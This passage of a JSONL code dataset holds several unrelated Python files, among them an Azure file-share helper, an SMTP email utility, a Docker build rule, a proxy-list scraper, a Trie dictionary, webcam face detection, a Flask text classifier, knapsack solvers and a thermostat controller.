FileService, ContentSettings\n\nimport settings\n\n\n\ndef it_count(it):\n cnt = count()\n deque(zip(it, cnt), 0)\n return next(cnt)\n\n\nclass AzureFileService(object):\n def __init__(self, account_name, account_key, share_name):\n self.file_service = FileService(account_name=account_name, account_key=account_key)\n self.share_name = share_name\n\n\n def write_json_to_azure(self, data):\n try:\n self.file_service.create_file_from_text(\n share_name=self.share_name,\n directory_name=self.create_directory('data{}'.format(''.join(settings.TAGS).replace('#','_'))),\n file_name='{}_{}.json'.format(datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\"), json.loads(data)['id_str']),\n text=json.loads(data)['text'],\n content_settings=ContentSettings('text/json'),\n timeout=5\n )\n\n except KeyError as e:\n pass # This is already handled in taglistener.py\n\n\n def create_directory(self, directory_name):\n dir_already_exists = False\n for item in self.file_service.list_directories_and_files(self.share_name):\n if item.name == directory_name:\n dir_already_exists = True\n break\n if not dir_already_exists:\n self.file_service.create_directory(self.share_name, directory_name)\n\n return directory_name\n\n\n def get_items(self, directory_name=None):\n return self.file_service.list_directories_and_files(self.share_name, directory_name=directory_name)\n\n\n def print_items(self, directory_name=None):\n for item in self.get_items(directory_name=directory_name):\n print(item.name)\n\n\n def count_items(self, directory_name=None):\n return it_count(self.get_items(directory_name=directory_name))\n","sub_path":"tweet-miner/azurefileservice.py","file_name":"azurefileservice.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"266751190","text":"'''\r\nCreated on Jan 25, 2016\r\n\r\n@author: KIT1HC\r\n'''\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom src.LoggerUtil import Logger\r\n\r\nclass EmailUtil(object):\r\n\r\n def __init__(self, server, port, usrname=\"\", pwd=\"\"):\r\n self.logger = Logger()\r\n self.logger.name = __name__\r\n \r\n self.server = server\r\n self.port = port\r\n self.usrname = usrname\r\n self.pwd = pwd\r\n \r\n def sendEmail(self, fromAdd, toAdd, subject, body, attachment=\"\"):\r\n server = smtplib.SMTP(self.server, self.port)\r\n msg = self._createMsg(fromAdd, toAdd, subject, body);\r\n \r\n if attachment != \"\":\r\n f = file(attachment)\r\n att = MIMEText(f.read())\r\n att.add_header(\"Content-Disposition\", \"attachment\", filename=attachment)\r\n msg.attach(att)\r\n \r\n server.sendmail(fromAdd, toAdd, msg.__str__())\r\n self.logger.info(\"Email Sent\")\r\n\r\n \r\n def _createMsg(self, fromAdd, toAdd, subject, body):\r\n msg = MIMEMultipart()\r\n\r\n msg['From'] = fromAdd\r\n msg['To'] = toAdd\r\n msg['Subject'] = subject\r\n msg.attach(MIMEText(body, 'html'))\r\n return msg\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n host = \"rb-smtp-int.bosch.com\"\r\n port = 25\r\n username = \"thach.kieubuu@vn.bosch.com\"\r\n toAdd = \"thach.kieubuu@vn.bosch.com;\"\r\n pwd = \"\"\r\n body = \"test\\r\\n\"\r\n subject = \"python framework\"\r\n attachment = \"d:/log.txt\"\r\n \r\n email = EmailUtil(host, port)\r\n email.sendEmail(username, toAdd, subject, body, attachment)\r\n# email.sendEmail(username, toAdd, subject, 
body)","sub_path":"com.etas.systemtest.utils/src/EmailUtil.py","file_name":"EmailUtil.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"253702157","text":"# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom typing import Mapping\n\nfrom pants.backend.docker.util_rules.docker_build_args import DockerBuildArgs\nfrom pants.engine.fs import Digest\nfrom pants.engine.process import (\n BinaryNotFoundError,\n BinaryPath,\n BinaryPathRequest,\n BinaryPaths,\n BinaryPathTest,\n Process,\n ProcessCacheScope,\n SearchPath,\n)\nfrom pants.engine.rules import Get, collect_rules, rule\nfrom pants.util.logging import LogLevel\nfrom pants.util.strutil import pluralize\n\n\nclass DockerBinary(BinaryPath):\n \"\"\"The `docker` binary.\"\"\"\n\n DEFAULT_SEARCH_PATH = SearchPath((\"/usr/bin\", \"/bin\", \"/usr/local/bin\"))\n\n def build_image(\n self,\n tags: tuple[str, ...],\n digest: Digest,\n dockerfile: str | None = None,\n build_args: DockerBuildArgs | None = None,\n env: Mapping[str, str] | None = None,\n ) -> Process:\n args = [self.path, \"build\"]\n\n for tag in tags:\n args.extend([\"-t\", tag])\n\n if build_args:\n for build_arg in build_args:\n args.extend([\"--build-arg\", build_arg])\n\n if dockerfile:\n args.extend([\"-f\", dockerfile])\n\n # Add build context root.\n args.append(\".\")\n\n return Process(\n argv=tuple(args),\n description=(\n f\"Building docker image {tags[0]}\"\n + (f\" +{pluralize(len(tags)-1, 'additional tag')}.\" if len(tags) > 1 else \".\")\n ),\n env=env,\n input_digest=digest,\n cache_scope=ProcessCacheScope.PER_SESSION,\n )\n\n def push_image(self, tags: tuple[str, ...]) -> Process | None:\n if not tags:\n return None\n\n return Process(\n argv=(self.path, \"push\", *tags),\n cache_scope=ProcessCacheScope.PER_SESSION,\n description=f\"Pushing docker image {tags[0]}\",\n )\n\n\n@dataclass(frozen=True)\nclass DockerBinaryRequest:\n search_path: SearchPath = DockerBinary.DEFAULT_SEARCH_PATH\n\n\n@rule(desc=\"Finding the `docker` binary\", level=LogLevel.DEBUG)\nasync def find_docker(docker_request: DockerBinaryRequest) -> DockerBinary:\n request = BinaryPathRequest(\n binary_name=\"docker\",\n search_path=docker_request.search_path,\n test=BinaryPathTest(args=[\"-v\"]),\n )\n paths = await Get(BinaryPaths, BinaryPathRequest, request)\n first_path = paths.first_path\n if not first_path:\n raise BinaryNotFoundError.from_request(request, rationale=\"interact with the docker daemon\")\n return DockerBinary(first_path.path, first_path.fingerprint)\n\n\n@rule\nasync def get_docker() -> DockerBinary:\n return await Get(DockerBinary, DockerBinaryRequest())\n\n\ndef rules():\n return collect_rules()\n","sub_path":"src/python/pants/backend/docker/util_rules/docker_binary.py","file_name":"docker_binary.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"16784461","text":"#coding:utf-8\nimport urllib.request\nimport re\nimport time\n#the time now\ntime=time.strftime('%Y-%m-%d',time.localtime(time.time()))\n\nurl_id=1204\nwhile url_id<=(url_id+50):\n #visit the page\n url='http://www.youdaili.cn/Daili/http/%d.html'%url_id\n req=urllib.request.Request(url)\n response=urllib.request.urlopen(url)\n 
html=response.read().decode('utf-8')\n #find the time on the page\n reg=re.compile(r'\\d{4}-\\d{2}-\\d{2}')\n result=reg.findall(html)\n result=result[0]\n #is the page released today?\n if result==time:\n print('开始获取,开始下载')\n reg2=re.compile(r'\\d*\\.\\d*\\.\\d*\\.\\d*')\n result2=reg2.findall(html)\n print('下载完成')\n #print (result2)\n break\n\n else:\n url_id+=5\n #print(url_id)\n\nelse:\n print('获取失败...')\n\n","sub_path":"模拟点击安居客房源单页/iplist.py","file_name":"iplist.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"574206016","text":"from typing import List\n\n\nclass TrieNode:\n\n def __init__(self, val):\n self.val = val\n self.is_word = False\n self.children = {}\n\n def __repr__(self):\n return str({\n 'val:': self.val,\n 'children:': sorted(self.children.keys()),\n 'is_word:': self.is_word,\n })\n\n def has(self, val):\n return val in self.children\n\n def get(self, val):\n return self.children[val]\n\n def put(self, val):\n node = TrieNode(val)\n self.children[val] = node\n return node\n\n def put_node(self, node):\n if self.children.get(node.val) == node:\n return\n\n val = node.val\n self.children[val] = node\n\n\n# sc:\n# When key length is low: (A * N)\n# When key length is high: (A * L * K)\n# A: alphabet size\n# N: number of nodes (links)\n# K: average key (word) length\nclass Trie:\n\n def __init__(self):\n self.root = TrieNode(None)\n self.sentinel = '#'\n\n # tc: O(2^W)\n def add(self, word, node=None):\n if word:\n if node is None:\n node = self.root\n else:\n if node:\n node.is_word = True\n return\n\n char = word[0]\n\n if not node.has(char):\n node.put(char)\n if not node.has(self.sentinel):\n node.put(self.sentinel)\n\n self.add(word[1:], node.get(char))\n self.add(word[1:], node.get(self.sentinel))\n\n # tc: O(N)\n def contains(self, word, node=None):\n if node is None:\n node = self.root\n\n for i, letter in enumerate(word):\n if letter == '.':\n if node.has(self.sentinel):\n node = node.get(self.sentinel)\n else:\n return False\n elif node.has(letter):\n node = node.get(letter)\n else:\n return False\n\n return node.is_word\n\n\nclass WordDictionary:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.trie = Trie()\n\n # tc: O(N)\n def addWord(self, word: str) -> None:\n \"\"\"\n Adds a word into the data structure.\n \"\"\"\n self.trie.add(word)\n\n # tc: O(26^W)\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the data structure. A word could contain the dot character '.' 
to represent any one letter.\n \"\"\"\n return self.trie.contains(word)\n\n\n# Your WordDictionary object will be instantiated and called as such:\n# obj = WordDictionary()\n# obj.addWord(word)\n# param_2 = obj.search(word)\n\nclass Solution:\n\n serialize = {\n None: 'null',\n True: 'true',\n False: 'false'\n }\n\n def run(self, actions, inputs):\n ans = [None]\n wd = WordDictionary()\n\n for j, action in enumerate(actions[1:], 1):\n if action == 'addWord':\n word = inputs[j][0]\n wd.addWord(word)\n ans.append(None)\n elif action == 'search':\n word = inputs[j][0]\n res = wd.search(word)\n ans.append(res)\n\n ans = [ serialize[entry] for entry in ans ]\n ans = '[' + ','.join(ans) + ']'\n","sub_path":"Leetcode/add_and_search_word/solution_eager.py","file_name":"solution_eager.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"357337212","text":"import cv2\nimport sys\nimport os\nimport numpy as np\n\n'''\nimg = cv2.imread(os.path.join(os.path.dirname(os.path.realpath(__file__)),'cat.bmp'))\n\nif img is None:\n print('Image load failed')\n sys.exit()\n\n#img = cv2.bitwise_not(img)\n\n\ncv2.namedWindow('image')\ncv2.imshow('image', img)\ncv2.waitKey()\n\ncv2.destroyAllWindows()\n'''\nxml = 'haarcascade_frontalface_default.xml'\nface_cascade = cv2.CascadeClassifier(os.path.join(os.path.dirname(os.path.realpath(__file__)),xml))\nrgbNum = [(255, 0, 0),(0, 255, 0),(0, 0, 255),(255, 255, 0),(255, 0, 255),(0, 255, 255)]\n\ncapture = cv2.VideoCapture(0)\ncapture.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncapture.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\nwhile True:\n ret, frame = capture.read()\n frame = cv2.flip(frame, 1)\n\n g = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n faces = face_cascade.detectMultiScale(g, 1.05, 5)\n\n if len(faces):\n for i, (x,y,w,h) in enumerate(faces):\n cv2.rectangle(frame, (x,y), (x+w, y+h), rgbNum[i], 2)\n\n cv2.imshow(\"VideoFrame\", frame)\n k = cv2.waitKey(30) & 0xff\n if k == 27: # Esc 키를 누르면 종료\n break\n\ncapture.release()\ncv2.destroyAllWindows()","sub_path":"python/opencv_haarcascade_frontalface_detection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"437177733","text":"from collections import Counter\nfrom itertools import islice, tee\nimport logging\nimport re\nimport sys\n\nfrom flask import Flask, jsonify, request\nfrom sklearn.externals import joblib\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\n\nVERSION = 0.1\napp = Flask(__name__)\n\n\n@app.route('/v1/documents', methods=['POST'])\ndef create_tasks():\n response = {}\n text = request.json['text']\n classes = predict_review(clf_, text)\n response['labels'] = classes\n response['version'] = VERSION\n response['text_input'] = text\n \n log_out = response.copy()\n log_out.update(ip=request.remote_addr)\n logger.info(log_out)\n return jsonify(**response)\n\ndef tokenize(sentence):\n words = re.findall(\"[a-zA-Z]+\", sentence)\n bigram = []\n\n for gram in generate_ngrams(words, 2):\n bigram.append('{0} {1}'.format(gram[0], gram[1]))\n\n words.extend(bigram)\n return words\n\ndef generate_ngrams(lst, n):\n ilst = lst\n while True:\n a, b = tee(ilst)\n l = tuple(islice(a, n))\n if len(l) == n:\n yield l\n next(b)\n ilst = b\n else:\n break\n\ndef predict_review(clf_, review):\n d = ['Satisfaction', 'Content', 'Stability', 
'Security',\n 'Privacy', 'Pricing', 'Usefulness']\n x = tfidf_transformer.transform(dict_vectorizer.transform(Counter(tokenize(review))))\n return sorted([(d[i], p) for i, p in enumerate(clf_.predict_proba(x)[0]) \\\n if p > 0.2], key=lambda x: -x[1])\n\nif __name__ == \"__main__\":\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.INFO)\n logger.addHandler(handler)\n \n clf_ = joblib.load('review_classification.pkl')\n dict_vectorizer = joblib.load('dict_vectorizer.pkl')\n tfidf_transformer = joblib.load('tfidf_transformer.pkl')\n app.run(debug=True, host='0.0.0.0')\n \n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"592517034","text":"from framework.rom import meta\nfrom framework.rom import rom_object\nfrom framework.rom import rom_property\nfrom framework.rom import rom_relation\nfrom framework.rom import base_types\nfrom framework.utils import log\nimport copy\nimport sqlalchemy\nfrom sqlalchemy import exc\n\n\nclass QueryState(base_types.ROMEnum):\n STOPPED = 0, 'Stopped'\n RUNNING = 1, 'Running'\n PAUSED = 2, 'Paused'\n\n\n@meta.rom()\nclass ResultQuery(rom_object.ROMObject):\n result_data = rom_relation.Relation(name=base_types.PARENT_CHILD_RELATION, src_cls_name='ResultQuery',\n target_cls_name='Result')\n\n State = rom_property.EnumProperty(QueryState, default=QueryState.STOPPED, category='state', display='State',\n serializable=False, description='The state of a statistics query')\n\n Interval = rom_property.U32Property(default=1000, category='config', display='Update interval',\n validator=(rom_property.NumRangeValidator(0, 60000),))\n\n # Advanced query provides a complete select statement\n Sql = rom_property.StringProperty(default='', category='config', display='Query sql statement', serializable=False,\n notify_mode='manual', description='The advanced query sql statement')\n\n # The columns to be queried. Empty means all columns defined in the result data class of result view\n Columns = rom_property.StringProperty(default='', category='config', display='Column names', aggregate=True,\n description='The column names to be queried')\n\n TargetPorts = rom_property.HandleProperty(default='', category='config', display='Target Ports', aggregate=True,\n description='The ports to be queried', private=True, serializable=False)\n\n def __init__(self):\n super().__init__()\n self._handler = None\n\n def _finalize(self):\n if self._handler:\n self._handler.destroy()\n\n def validate(self):\n return True, ''\n\n def on_prop_changed(self, prop_obj, old_value=None):\n if prop_obj.name == 'State':\n self.get_parent().update_cmd_status()\n elif prop_obj.name == 'TargetPorts':\n self._handler.reset_target_ports()\n self.restart()\n elif prop_obj.name == 'Interval':\n self.restart()\n\n @property\n def handler(self):\n if not self._handler:\n self._prepare()\n return self._handler\n\n @handler.setter\n def handler(self, value):\n if value != self._handler:\n self._handler.destroy()\n self._handler = value\n\n @property\n def backing_cls(self):\n return self.get_parent().backing_cls\n\n def _prepare(self):\n from . 
import handler\n self._handler = handler.create_handler(self)\n\n def start(self, enable_subscribe=True):\n if self.State != QueryState.RUNNING:\n self.handler.start(enable_subscribe=enable_subscribe)\n self.State = QueryState.RUNNING\n\n def stop(self):\n if self.State != QueryState.STOPPED:\n self.handler.stop()\n self.State = QueryState.STOPPED\n\n def pause(self):\n if self.State == QueryState.RUNNING:\n self.handler.pause()\n self.State = QueryState.PAUSED\n\n def resume(self):\n if self.State == QueryState.PAUSED:\n self.handler.resume()\n self.State = QueryState.RUNNING\n\n def restart(self, force=False):\n if self.State != QueryState.STOPPED or force:\n old_state = self.State\n self.stop()\n self.start(enable_subscribe=True if old_state == QueryState.RUNNING else False)\n\n def refresh(self):\n old_state = self.State\n self.start()\n if old_state != QueryState.STOPPED:\n self.handler.refresh()\n\n def clear_result(self):\n self.handler.clear_result()\n\n def remove_result(self):\n self.handler.remove_result()\n\n def get_target_ports(self):\n return self.TargetPorts\n\n def get_query_columns(self):\n result_cls = self.backing_cls\n if not self.Columns:\n return copy.copy(result_cls.get_columns())\n else:\n columns = copy.copy(result_cls.primary_keys())\n columns.append(result_cls.get_result_source_prop())\n temp = []\n for column_name in self.Columns:\n if not column_name:\n log.Logger.CL.warn('Empty column name in {}.Columns'.format(result_cls.cls_name()))\n continue\n\n values = column_name.split('.')\n if len(values) > 1 and values[0] != result_cls.cls_name():\n log.Logger.CL.warn('Invalid column name: {}'.format(column_name))\n continue\n\n prop = result_cls.get_prop_obj(values[1])\n if prop and prop not in columns:\n temp.append(prop)\n else:\n log.Logger.CL.warn('Cannot find column name: {}'.format(column_name))\n\n columns.extend(temp)\n return columns\n\n @classmethod\n def get_query_columns_by_names(cls, columns, result_cls):\n if columns:\n ret = copy.copy(result_cls.primary_keys())\n ret.append(result_cls.get_result_source_prop())\n temp = []\n columns_copy = copy.copy(columns)\n for column in columns_copy:\n if not column:\n columns.remove(column)\n continue\n\n values = column.split('.')\n if len(values) > 1 and values[0] != result_cls.cls_name():\n continue\n\n prop = result_cls.get_prop_obj(values[1])\n if prop and prop not in ret:\n temp.append(prop)\n columns.remove(column)\n ret.extend(temp)\n else:\n ret = copy.copy(result_cls.get_columns())\n return ret\n\n @classmethod\n def do_local_query(cls, handler):\n \"\"\"\n Query local memory database\n :param handler:\n :return: result objects needs to update to PL\n \"\"\"\n query = handler.query\n if query.State != QueryState.RUNNING:\n return\n\n result_cls = handler.backing_cls\n objects = []\n sql = sqlalchemy.text(result_cls.prepare_local_query(query))\n try:\n from .import db_api\n rows = db_api.ResultDatabase.orm_conn.execute(sql)\n for row in rows:\n obj = handler.upsert(row)\n if obj:\n objects.append(obj)\n except exc.SQLAlchemyError as err:\n log.Logger.CL.error('Failed to execute SQL {0} due to error:{1}'.format(sql, str(err)))\n\n return objects\n","sub_path":"CL/framework/result/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":6909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"614818775","text":"import random as rand\r\nimport sys\r\nfrom copy import deepcopy\r\nimport time\r\nimport numpy as np\r\nimport itertools\r\nimport 
datetime\r\nimport matplotlib.pyplot as plt\r\n\r\nfileName = \"\"\r\nmethod = 0\r\nN = 0\r\nmax_weight =0\r\nval= []\r\nwt =[]\r\ntimes = []\r\ndef main(arg):\r\n global N, max_weight, times\r\n if(arg[1]== '1'):\r\n \r\n print(\"Fuerza bruta\")\r\n matrix, origin = processArg(arg)\r\n for j in range(0, num(N)): # se toma el tiempo\r\n if origin == 2:\r\n print(\"Resultado:\")\r\n start_time = datetime.datetime.now()\r\n itemsSlected,weigth,optimalValue =knapsack_brute_force(matrix,max_weight)\r\n print(\"Beneficio máximo: \" + str(optimalValue))\r\n print(\"Incluidos: \"+str(itemsSlected)[1:len(str(itemsSlected))-1])\r\n print(\"Resultado:\")\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n else:\r\n print(\"Resultado:\")\r\n max_weight=matrix[0][0]\r\n numMatrix = setUpKnapSack(matrix)\r\n start_time = datetime.datetime.now()\r\n itemsSlected,weigth,optimalValue =knapsack_brute_force(numMatrix,max_weight)\r\n print(\"Beneficio máximo: \" + str(optimalValue))\r\n print(\"Incluidos: \"+str(itemsSlected)[1:len(str(itemsSlected))-1])\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n suma = 0\r\n for i in times:\r\n suma = suma + i\r\n suma = suma/len(times)\r\n print(\"Tiempor promedio de ejecución: \"+str(suma))\r\n '''plt.plot(times)\r\n plt.ylabel('Tiempo de ejecución')\r\n plt.xlabel('Iteración')\r\n plt.show()'''\r\n \r\n elif(arg[1] == '2'):\r\n print(\"Bottom up\")\r\n matrix, origin = processArg(arg)\r\n for j in range(0, num(N)): # se toma el tiempo\r\n if origin == 2:\r\n start_time = datetime.datetime.now()\r\n V = dynamicKnapSack(max_weight, matrix, len(matrix))\r\n print(\"Beneficio máximo: \"+ str(V[len(matrix)][max_weight]))\r\n \r\n itemSelected,wtf= findElements(V, max_weight,len(matrix), matrix)\r\n print(\"Incluidos: \"+str(itemSelected)[1:len(str(itemSelected))-1])\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n \r\n\r\n else:\r\n numMatrix = setUpKnapSack(matrix)\r\n max_weight=matrix[0][0]\r\n print(setFormat(numMatrix))\r\n start_time = datetime.datetime.now()\r\n V = dynamicKnapSack(max_weight, numMatrix, len(numMatrix))\r\n print(\"Beneficio máximo: \"+ str(V[len(numMatrix)][max_weight]))\r\n \r\n itemSelected,wtf= findElements(V, max_weight,len(numMatrix), numMatrix)\r\n print(\"Incluidos: \"+str(itemSelected)[1:len(str(itemSelected))-1])\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n suma = 0\r\n for i in times:\r\n suma = suma + i\r\n suma = suma/len(times)\r\n '''print(\"Tiempor promedio de ejecución: \"+str(suma))\r\n plt.plot(times)\r\n plt.ylabel('Tiempo de ejecución')\r\n plt.xlabel('Iteración')\r\n plt.show()'''\r\n elif (arg[1]== '3'):\r\n \r\n global val, wt\r\n print(\"top-down\") \r\n matrix, origin = processArg(arg)\r\n for j in range(0, num(N)): # se toma el tiempo\r\n if origin == 2:\r\n val, wt = setFormat(matrix)\r\n memo = 
generateMemo(len(val),max_weight+1)\r\n start_time = datetime.datetime.now()\r\n print(\"Beneficio máximo:\" + str(topDownKnapsack((len(val)-1), max_weight, memo))) \r\n printChoosen((choosenItems(memo)))\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n\r\n else:\r\n numMatrix = setUpKnapSack(matrix)\r\n max_weight = matrix[0][0]\r\n \r\n wt,val = setFormat(numMatrix)\r\n \r\n memo = generateMemo(len(val),max_weight+1)\r\n start_time = datetime.datetime.now()\r\n print(\"Beneficio máximo:\" + str(topDownKnapsack((len(val)-1), max_weight, memo))) \r\n printChoosen((choosenItems(memo)))\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n suma = 0\r\n for i in times:\r\n suma = suma + i\r\n suma = suma/len(times)\r\n print(\"Tiempor promedio de ejecución: \"+str(suma))\r\n '''plt.plot(times)\r\n plt.ylabel('Tiempo de ejecución')\r\n plt.xlabel('Iteración')\r\n plt.show()'''\r\n else:\r\n print(\"Metodo no implementado\")\r\n\r\ndef processArg(datos):\r\n global fileName, N\r\n if(len(datos) == 5):\r\n if(datos[2]==\"-a\"):\r\n fileName = datos[3]\r\n listOfData =readFile()\r\n N = num(datos[4])\r\n return formatMatrix(listOfData), 1\r\n else: \r\n\r\n print(\"Existe un problema con los parametros del sistema\")\r\n\r\n elif(len(datos) == 8 ):\r\n global max_weight\r\n if(datos[2]==\"-p\"):\r\n print(\"Procesando parametros\")\r\n max_weight= num(datos[3])\r\n elements = num(datos[4])\r\n weigth = datos[5].split('-')\r\n value = datos[6].split('-')\r\n value[0] = num(value[0])\r\n value[1] = num(value[1]) \r\n weigth[0] = num(weigth[0])\r\n weigth[1] = num(weigth[1])\r\n N = num(datos[7])\r\n return build_items(elements, weigth, value),2\r\n\r\n\r\n else:\r\n print(\"Existe un problema con los parametros del sistema\") \r\n\r\ndef readFile():\r\n lines = open(fileName, 'r').readlines()\r\n lines = list(map(removeEndLine, lines))\r\n listOfLists = []\r\n for line in lines:\r\n splittedLine = line.split(\",\")\r\n listOfLists.append(splittedLine)\r\n return listOfLists\r\n\r\ndef removeEndLine(line):\r\n if(line.endswith(\"\\n\")):\r\n return line.replace(\"\\n\", \"\")\r\n return line\r\n\r\ndef num(s):\r\n try:\r\n return int(s)\r\n except ValueError:\r\n return float(s)\r\n\r\ndef formatMatrix(matrix):\r\n for row in range(len(matrix)):\r\n for column in range(len(matrix[row])):\r\n matrix[row][column] = num(matrix[row][column])\r\n \r\n return matrix\r\n\r\ndef setUpKnapSack(matrix):\r\n global max_weight\r\n currentMatrix = matrix[1:]\r\n newMatrix=[]\r\n n = len(currentMatrix)\r\n currentId = 1\r\n for i in currentMatrix:\r\n element = [currentId] + i\r\n currentId +=1\r\n newMatrix = newMatrix + [element]\r\n return newMatrix \r\n \r\n\r\n\r\ndef build_items(n, w, v):\r\n res= []\r\n rand.seed(time.time())\r\n for i in range(n):\r\n res.append((i, rand.randint(w[0], w[1]), rand.randint(v[0], v[1])))\r\n\r\n print(max_weight)\r\n\r\n return res\r\n\r\ndef powerset(items):\r\n res = [[]]\r\n for item in items:\r\n newset = [r+[item] for r in res]\r\n res.extend(newset)\r\n \r\n return res\r\n\r\n\r\ndef knapsack_brute_force(items, max_weight):\r\n knapsack = []\r\n best_weight = 0\r\n best_value = 0\r\n ids =[]\r\n for item_set in 
powerset(items):\r\n set_weight = sum([e[1] for e in item_set])\r\n set_value = sum([e[2] for e in item_set])\r\n if set_value > best_value and set_weight <= max_weight:\r\n best_value = set_value\r\n best_weight = set_weight\r\n knapsack = item_set\r\n for i in knapsack:\r\n ids = [i[0]] +ids\r\n return ids, best_weight, best_value\r\n\r\ndef dynamicKnapSack(W, items, n):\r\n V = []\r\n\r\n for i in range(n + 1):\r\n V.append([0] * (W + 1))\r\n\r\n for i in range(1, n + 1): \r\n for w in range(W + 1): \r\n if (items[i - 1][1] > w):\r\n V[i][w] = V[i - 1][w]\r\n elif (items[i - 1][2] + V[i - 1][w - items[i - 1][1]] > V[i - 1][w]):\r\n V[i][w] = items[i - 1][2] + V[i - 1][w - items[i - 1][1]]\r\n else: \r\n V[i][w] = V[i - 1][w]\r\n return V\r\n\r\n\r\ndef findElements(V,W,n,items):\r\n k = W\r\n peso= 0\r\n elements = []\r\n for i in range(n, 0, -1):\r\n if (V[i][k] != V[i - 1][k]):\r\n elements.append(i)\r\n i -= 1\r\n peso = peso+items[i][1]\r\n k -= items[i][1]\r\n else:\r\n i -= 1\r\n \r\n return [elements,peso]\r\n\r\n\r\n#Top Down\r\ndef topDownKnapsack(item, capacity, memo):\r\n if(capacity < 0):\r\n return -(1<<60)\r\n elif capacity == 0 or item == 0:\r\n return 0\r\n elif memo[item][capacity]:\r\n return memo[item][capacity]\r\n else:\r\n memo[item][capacity] = max(val[item] + topDownKnapsack(item-1, capacity - wt[item],memo), topDownKnapsack(item-1,capacity,memo))\r\n return memo[item][capacity]\r\n\r\n\r\ndef SET(n,i):\r\n return n | (1<= self.high_temp + self.activate_margin:\n target = self.high_temp - self.stop_margin\n self.logger.info(\"Current temp {} above high threshold {}, setting target to {}\".format(curr_temp, self.high_temp, target))\n self.mynest.set_target_temp(target)\n is_running = True\n self.logger.debug(\"Sleeping for {} seconds\".format(self.refresh_rate))\n time.sleep(self.refresh_rate)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Use Enviro pHAT temperature and Nest to maintain temp range.')\n\n parser.add_argument(dest=\"low_temp\", help=\"Lowest acceptable temp (in Fahrenheit)\", type=int)\n parser.add_argument(dest=\"high_temp\", help=\"Highest acceptable temp (in Fahrenheit)\", type=int)\n\n parser.add_argument(\"--refresh-rate\", help=\"Rate for polling temp from Enviro pHAT (in Hz, default=60)\", type=int, default=60)\n parser.add_argument(\"--activate-margin\", help=\"How many outside of the target range before start heating/cooling? (default=1)\", type=int, default=1)\n parser.add_argument(\"--stop-margin\", help=\"How many insde of the target range before stop heating/cooling? (default=2)\", type=int, default=2)\n parser.add_argument(\"--dummy-nest\", help=\"Use this for testing in order to not get throttled by the Nest API\", type=bool, action='store_true')\n\n args = parser.parse_args()\n\n control = EnviroNestControl(\n args.low_temp,\n args.high_temp,\n args.activate_margin,\n args.stop_margin,\n args.refresh_rate,\n dummy_nest=False\n )\n\n control.run()","sub_path":"enviro_nest_control.py","file_name":"enviro_nest_control.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"84902457","text":"'''\nCreated on 21 set. 2017\n\n1. http://django-role-permissions.readthedocs.io/en/stable/\n2. pip install django-role-permissions\n3. python manage.py shell (Para despues poder asignar roles a usuarios)\n4. from rolepermissions.roles import assign_role\n5. Crear usuarios en django admin\n6. 
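
The knapsack entry above benchmarks three strategies for the same 0/1 problem: brute force over the power set (O(2^n) subsets), a bottom-up table (O(n*W)), and a memoized top-down recursion. As a compact, self-contained restatement of the bottom-up recurrence that dynamicKnapSack fills in, with illustrative item data and names not taken from the entry:

def knapsack_max_value(items, capacity):
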